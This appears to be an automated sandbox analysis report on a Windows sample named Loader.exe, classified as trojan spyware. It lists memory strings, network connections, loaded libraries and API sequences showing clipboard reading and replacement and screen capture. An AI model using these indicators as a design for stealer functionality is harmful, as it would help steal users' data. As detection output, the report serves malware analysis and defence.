Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.6:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.6:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.6:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49716 version: TLS 1.2

Source: C:\Users\user\Desktop\Loader.exe

Code function: 1_2_0043FF00 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

1_2_0043FF00

Source: C:\Users\user\Desktop\Loader.exe

Code function: 1_2_00F41000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

1_2_00F41000

Source: C:\Users\user\Desktop\Loader.exe

Code function: 1_2_0043FF00 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

1_2_0043FF00

Source: C:\Users\user\Desktop\Loader.exe

Code function: 1_2_00440324 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

1_2_00440324

Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041F853	1_2_0041F853
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0044B07D	1_2_0044B07D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00448810	1_2_00448810
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0040E8C0	1_2_0040E8C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0044D160	1_2_0044D160
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041EB15	1_2_0041EB15
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_004293C0	1_2_004293C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0040DC22	1_2_0040DC22
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00437C3B	1_2_00437C3B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0044DCE0	1_2_0044DCE0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00415CEE	1_2_00415CEE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00444C80	1_2_00444C80
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00430560	1_2_00430560
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00410D6E	1_2_00410D6E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00438510	1_2_00438510
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041AD30	1_2_0041AD30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00421670	1_2_00421670
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00417700	1_2_00417700
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0040F728	1_2_0040F728
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00401040	1_2_00401040
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00438055	1_2_00438055
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0043806B	1_2_0043806B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0042F810	1_2_0042F810
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00433810	1_2_00433810
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00427020	1_2_00427020
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0044C820	1_2_0044C820
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0043D0D0	1_2_0043D0D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0040D8E0	1_2_0040D8E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041F0E0	1_2_0041F0E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_004468A0	1_2_004468A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0043B0B6	1_2_0043B0B6
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0044D940	1_2_0044D940
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00444140	1_2_00444140
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0043215F	1_2_0043215F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0043E102	1_2_0043E102
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00414106	1_2_00414106
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0043F920	1_2_0043F920
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00449130	1_2_00449130
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_004379C1	1_2_004379C1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041EB15	1_2_0041EB15
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_004309D0	1_2_004309D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00424980	1_2_00424980
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_004361A0	1_2_004361A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0043DA4B	1_2_0043DA4B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041CA5F	1_2_0041CA5F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00408A70	1_2_00408A70
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00402AD0	1_2_00402AD0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0040A2F0	1_2_0040A2F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00432A85	1_2_00432A85
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0042D288	1_2_0042D288
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0042DAB0	1_2_0042DAB0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00416B42	1_2_00416B42
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0042A370	1_2_0042A370
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0043A374	1_2_0043A374
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0040F31E	1_2_0040F31E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00433810	1_2_00433810
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_004253D0	1_2_004253D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_004113D6	1_2_004113D6
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_004203F9	1_2_004203F9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_004443A0	1_2_004443A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00430BB9	1_2_00430BB9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0042DC40	1_2_0042DC40
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0043FC40	1_2_0043FC40
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0040D450	1_2_0040D450
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00443474	1_2_00443474
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0043C4D2	1_2_0043C4D2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00445CD0	1_2_00445CD0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0042DCF2	1_2_0042DCF2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0042FC8D	1_2_0042FC8D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041C4B2	1_2_0041C4B2
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00424D40	1_2_00424D40
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00420D60	1_2_00420D60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00407D70	1_2_00407D70
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00403510	1_2_00403510
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0040CD20	1_2_0040CD20
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00446520	1_2_00446520
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0044C528	1_2_0044C528
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00429D30	1_2_00429D30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0040FDC0	1_2_0040FDC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_004235F0	1_2_004235F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00442E48	1_2_00442E48
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0044CE50	1_2_0044CE50
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0044D610	1_2_0044D610
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0040C630	1_2_0040C630
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041CECE	1_2_0041CECE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0040BED0	1_2_0040BED0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0040B680	1_2_0040B680
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0042B683	1_2_0042B683
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00428680	1_2_00428680
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0043BE94	1_2_0043BE94
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00403EB0	1_2_00403EB0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041D6BE	1_2_0041D6BE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00432742	1_2_00432742
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00425740	1_2_00425740
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00423F60	1_2_00423F60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041CF02	1_2_0041CF02
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_004397C7	1_2_004397C7
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00432FCD	1_2_00432FCD
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00410FF0	1_2_00410FF0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_004317FA	1_2_004317FA
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00442785	1_2_00442785
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0044C780	1_2_0044C780
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00408F90	1_2_00408F90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00404792	1_2_00404792
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0042D790	1_2_0042D790

Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 0040B2E0 appears 58 times
Source: C:\Users\user\Desktop\Loader.exe	Code function: String function: 0041AD20 appears 89 times

Source: C:\Users\user\Desktop\Loader.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 972

Source: Loader.exe, 00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameExterna.exe0 vs Loader.exe
Source: Loader.exe, 00000000.00000000.1225052750.0000000000C92000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameExterna.exe0 vs Loader.exe
Source: Loader.exe, 00000000.00000002.1301650235.000000000130E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Loader.exe
Source: Loader.exe	Binary or memory string: OriginalFilenameExterna.exe0 vs Loader.exe

Source: Loader.exe

Static PE information: Section: .CSS ZLIB complexity 1.000333325987306

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/6@15/3

Source: C:\Users\user\Desktop\Loader.exe

Code function: 1_2_00444C80 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

1_2_00444C80

Source: C:\Users\user\Desktop\Loader.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7612

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\26cbfc55-8773-4b70-a2f0-2311b5fe0d77

Jump to behavior

Source: Loader.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Loader.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Loader.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Loader.exe	Virustotal: Detection: 69%
Source: Loader.exe	ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\Loader.exe

File read: C:\Users\user\Desktop\Loader.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 972
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Loader.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Loader.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Loader.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\Admin\source\repos\Externa\Externa\obj\Release\Externa.pdb source: Loader.exe
Source:	Binary string: System.Windows.Forms.pdb source: WERA1D3.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERA1D3.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERA1D3.tmp.dmp.5.dr
Source:	Binary string: System.Windows.Forms.pdbhr source: WERA1D3.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WERA1D3.tmp.dmp.5.dr
Source:	Binary string: Externa.pdb source: WERA1D3.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERA1D3.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WERA1D3.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERA1D3.tmp.dmp.5.dr

Source: Loader.exe

Static PE information: 0x9BEF5DA9 [Mon Nov 25 13:52:41 2052 UTC]

Source: Loader.exe

Static PE information: section name: .CSS

Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_00453C38 push ebx; ret		1_2_00453C45
Source: C:\Users\user\Desktop\Loader.exe	Code function: 1_2_0041F4E9 pushad ; ret		1_2_0041F4EA

Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
